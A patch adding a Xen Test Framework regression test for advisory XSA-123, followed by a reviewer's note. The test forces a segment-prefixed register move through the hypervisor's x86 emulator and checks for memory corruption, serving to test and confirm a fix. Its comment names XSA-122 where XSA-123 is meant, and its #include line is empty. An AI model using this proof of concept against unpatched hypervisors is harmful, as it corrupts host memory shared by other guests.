From 4fc1e54ed1c8c1caf21302d24e7268802bae2498 Mon Sep 17 00:00:00 2001
From: Andrew Cooper
Date: Fri, 15 Jan 2016 15:44:58 +0000
Subject: [PATCH] XSA-123 PoC
Signed-off-by: Andrew Cooper
---
 docs/all-tests.dox | 2 ++
 tests/xsa-123/Makefile | 11 ++++++++
 tests/xsa-123/main.c | 62 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 75 insertions(+)
 create mode 100644 tests/xsa-123/Makefile
 create mode 100644 tests/xsa-123/main.c
diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index dae450d..08c5628 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -26,6 +26,8 @@ Coveres XSA-106 and XSA-156.
 @subpage test-xsa-122 - Hypervisor stack leak via xen_version() hypercall.
+@subpage test-xsa-123 - Hypervisor memory corruption due to x86 emulator flaw.
+
 @subpage test-xsa-167 - PV superpage sanity checks.
 @subpage test-xsa-168 - `INVVPID` non-canonical guest address.
diff --git a/tests/xsa-123/Makefile b/tests/xsa-123/Makefile
new file mode 100644
index 0000000..a4cd342
--- /dev/null
+++ b/tests/xsa-123/Makefile
@@ -0,0 +1,11 @@
+ROOT := $(abspath $(CURDIR)/../..)
+
+include $(ROOT)/build/common.mk
+
+NAME := xsa-123
+CATEGORY := xsa
+TEST-ENVS := hvm32
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-123/main.c b/tests/xsa-123/main.c
new file mode 100644
index 0000000..67479b5
--- /dev/null
+++ b/tests/xsa-123/main.c
@@ -0,0 +1,62 @@
+/**
+ * @file tests/xsa-123/main.c
+ * @ref test-xsa-123
+ *
+ * @page test-xsa-123 XSA-123
+ *
+ * Advisory: [XSA-123](http://xenbits.xen.org/xsa/advisory-123.html)
+ *
+ * An x86 instruction destination operand is either a memory reference or a
+ * register. Memory references always have an associated selector, and
+ * typically default to %%ds if not specified. The selector is not relevant
+ * however for a destination register operand.
+ *
+ * Before XSA-122, an enumeration representing an explicit segment override on
+ * a register destination instruction wasn't dropped, and would be stashed in
+ * a union, aliasing the lower half of a pointer into the register block on
+ * the stack.
+ *
+ * Register-destination instructions don't usually trap for emulation, and
+ * explicit segment overrides are rare in general. Compilers also make it
+ * hard to accidentally have a segment override for a register-destination
+ * instruction.
+ *
+ * This test explicitly forces a `%%cs:mov %%reg, %%reg` instruction through
+ * the x86 instruction emulator. If the destination register doesn't match
+ * the source register, hypervisor memory corruption has occurred.
+ *
+ * @sa tests/xsa-123/main.c
+ */
+#include
+
+void test_main(void)
+{
+ unsigned long src = 0x1234, dest = 0;
+
+ printk("XSA-123 PoC\n");
+
+ if ( !xtf_has_fep )
+ return xtf_error("Error: FEP not available\n");
+
+ asm volatile(_ASM_XEN_FEP
+ /* Explicit %cs segment override. */
+ ".byte 0x2e;"
+ "mov %k[src], %k[dest]"
+ : [src] "=r" (src), [dest] "=r" (dest)
+ : "0" (src), "1" (dest));
+
+ if ( dest != 0x1234 )
+ xtf_failure(" '%%cs:mov %%reg, %%reg' clobbered hypervisor memory\n");
+ else
+ xtf_success(" '%%cs:mov %%reg, %%reg' was emulated correctly\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
-- 
2.39.5
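Review bot: The fourth paragraph of the new file's header comment attributes the emulator flaw to the wrong advisory: it says `Before XSA-122, an enumeration representing an explicit segment override on`, but the behaviour it describes (a segment-override enumeration left in a union that aliases a pointer into the stack register block) is the one the @page title, the advisory link and the all-tests.dox entry in this same patch all tie to XSA-123, while XSA-122 is the xen_version() stack leak. The line should read `Before XSA-123, an enumeration representing an explicit segment override on`. Separately, the `#include` line carries no header name in this rendering, most likely because an angle-bracketed target was stripped when the patch was rendered rather than omitted in the commit; worth confirming the committed file names its header.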